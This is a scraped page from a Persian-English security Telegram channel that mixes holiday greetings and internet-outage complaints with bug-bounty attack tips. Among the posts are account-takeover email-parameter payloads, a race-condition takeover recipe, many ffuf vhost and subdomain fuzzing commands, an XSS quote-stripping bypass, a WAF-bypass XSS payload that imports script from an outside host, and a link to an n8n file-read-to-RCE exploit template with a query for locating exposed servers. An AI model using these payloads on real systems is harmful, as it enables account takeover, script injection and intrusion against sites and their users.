RadvanSec – Telegram
RadvanSec
1.03K subscribers
189 photos
27 videos
144 files
605 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
Forwarded from KALI
یه گروه هکری دولتی چینی اومده یه بدافزار به اسم ToneShell رو با یه روت‌کیت خیلی خفن ترکیب کرده تا فعالیت‌هاش کاملاً از دید ویندوز و آنتی‌ویروس‌ها قایم بمونه؛ این روت‌کیت توی هسته ویندوز (Kernel) لود میشه، فایل‌ها و ارتباطات بدافزار رو مخفی می‌کنه، حتی کاری می‌کنه Microsoft Defender هم نفهمه چی به چیه، و نتیجه‌ش اینه که هکرها می‌تونن مدت طولانی بی‌صدا داخل سیستم‌های دولتی (بیشتر تو آسیا) جاسوسی کنن، داده بدزدن و کنترل سیستم رو دستشون بگیرن بدون اینکه کسی بو ببره.


درایور مخرب با hook کردن توابع کرنل (مثل لیست پردازش‌ها و فایل‌ها) باعث میشه ToneShell اصلاً دیده نشه
ارتباط C2 (سرور فرماندهی) رمزگذاری شده‌ست و شبیه ترافیک عادی نشون داده میشه
بدافزار قابلیت remote command execution، آپلود/دانلود فایل، اجرای شل و persistence بلندمدت داره
چون تو کرنله، حذفش با ابزارهای معمول تقریباً غیرممکنه و اغلب نیاز به offline scan یا reinstall سیستم هست
هدف اصلیشون هم سازمان‌ها و نهادهای دولتی آسیایی بوده، یعنی جاسوسی بلندمدت نه خرابکاری.


@kali_signal
6🔥2
🔥51😍1
Happy New Year 🎉🥳
4🔥2
اختلال شدید اینترنت 👎

⭐️ @RadvanSec
👎6👍2🥰2
Forwarded from آرامش درونی
پدر یعنی:


ستونِ اطمینان؛
پناهی استوارکه تکیه می‌کنی
و هیچ هراسی از فرو ریختن نداری.



روز پدر بر همه‌ی پدران زحمت‌کش و فداکار مبارک باد.
❤‍🔥8
Forwarded from Cloudbaaz
📉آخرین وضعیت اینترنت در ایران که طبق گزارش آماری کلادفلر با ۳۵ درصد کاهش حجم ترافیک از حالت نرمال همراه بوده...🤦‍♂

عجب گیری کردیما😒
🤯3👍1
Yet another Account Takeover technique.

Seperator:
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

Array:
{"email":["victim@mail.com","hacker@mail.com"]}

#infosec #CyberSec #bugbountytips

⭐️ @RadvanSec
4
Race Condition to Account Takeover

1. User changes email:
POST /change-email → email=x@x(.com

2. Server sends confirmation link, but updates email before verification.

3. Attacker races the victim by claiming password reset for x@x(.com

⭐️ @RadvanSec

#Bugbountytips #BugBounty #CyberSecurity #infosec
#RadvanSec
5
Sharing my Burp Extension that earned me $200k in 2025 while API testing heavy JS-rich targets.

https://github.com/jenish-sojitra/JSAnalyzer

The tool helps find endpoints, files, internal emails, and some secrets from minified JS.

Its goal is to achieve maximum efficiency with reduced noise in results. Contributions and feedbacks are welcome.

⭐️ @RadvanSec
2🔥1
🔎 #BugBountyTip Advanced Fuzzing Techniques Most Hunters Miss

0) Setup variables (optional)

DOMAIN="company.com"
ORIGIN="company.com" # or https://<cdn-origin> or https://<ip>
WL="words.txt"
HY="hybrid.txt"

1) Direct subdomain fuzz (fast check)

Works when DNS resolves the hostnames.

ffuf -w "$WL" -u "https://FUZZ.$DOMAIN/" -t 200 -mc 200,301,302,401,403 -fs 0 -ac

2) VHOST / Host-header fuzz (CDN / reverse proxy routing)

When wildcard DNS isn’t visible but routing exists.

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

Save results (JSON)

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -of json -o vhost_fuzz.json -ac

3) Hyphenated hosts

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

4) Suffix & prefix environment tags

FUZZ-test.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-test.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

test-FUZZ.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: test-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

FUZZ.stage.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.stage.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

stage-FUZZ.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: stage-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

5) WWW namespace exploitation (🔥)

FUZZwww.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

wwwFUZZ.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

wwFUZZ.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

FUZZww.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

6) Numeric drift (use a numbers list)

Create a quick numbers list:

seq -w 0 500 > nums.txt

025www.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

www02.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

www-03.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

03-www.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZ-www.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

7) Separator drift (dot / hyphen / underscore / none)

underscore in DNS labels is uncommon but shows up in some internal/service records; test where allowed.

ffuf -w "$WL" -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w "$WL" -u "$ORIGIN" -H "Host: www_FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w "$WL" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

8) Token fusion (role bleeding)

Use a curated list roles.txt like: api auth cdn static sso id app admin internal edge

ffuf -w roles.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w roles.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

9) Third-party / vendor overlay

vendors.txt: jira confluence grafana kibana sentry datadog okta zendesk status

ffuf -w vendors.txt -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 200 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w vendors.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

10) Endpoint fuzzing (same mindset, different surface)

ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -t 200 -mc 200,204,301,302,401,403 -fc 404 -fs 0 -ac

With extensions

ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -e .php,.asp,.aspx,.jsp,.json,.txt,.bak,.zip -t 200 -mc 200,301,302,401,403 -fc 404 -fs 0 -ac

⭐️ @RadvanSec
👍4
Forwarded from GO-TO CVE
با عرض سلام خدمت همه‌ی عزیزان

علیرغم وجود اسکم‌ها و مشکلات متعدد در برخی برنامه‌های باگ‌بانتی ایرانی و خارجی، تصمیم گرفتم این کانال رو راه‌اندازی کنم تا بتونیم تجربه‌های واقعی بچه های امنیت کار رو از همکاری با این برنامه‌ها در یکجا جمع‌آوری کنم.

هدف من و ادمین های عزیز اینه که بعد از بررسی و اطمینان از صحت گزارش‌ها، اون‌ها رو در اختیار عموم قرار بدیم تا سایر دوستان وقت، انرژی و تخصصشون رو بی‌دلیل تلف نکنن و بتونن آگاهانه‌تر وارد این حوزه یا کار روی برنامه خاصی بشن .

این کانال متعلق به همه‌ی شماست — جایی برای شفافیت، تجربه‌محوری و حمایت از جامعه امنیتی کشور. ⚡️

https://news.1rj.ru/str/bugbountyfeedback
👎3
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:

<s"vg o"nload=al"ert() />

turns into a valid:

<noscript onload=alert()>

🚨 Never rely on poor input filtering!

#BugBounty #CyberSecurity

⭐️ @RadvanSec
2👍2🔥1
#Bypass Imperva, Akamai and CloudFlare WAF

=> Prepend with 50 chars then use

1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>

PoC: x55.is/brutelogic/xss

⭐️ @RadvanSec
3🔥1
روزهای خیلی خوبی میاد … شک نکنید
11❤‍🔥1🔥1
CVE-2026-21858.yaml
1.8 KB
n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain
https://github.com/Chocapikk/CVE-2026-21858

fofa:icon_hash="-831756631"

⭐️ @RadvanSec
👍51🔥1
‌ ‌reza
CVE-2026-21858.yaml
🔥52👍1
#176
تسلیت 🕊️🖤
7👏2👍1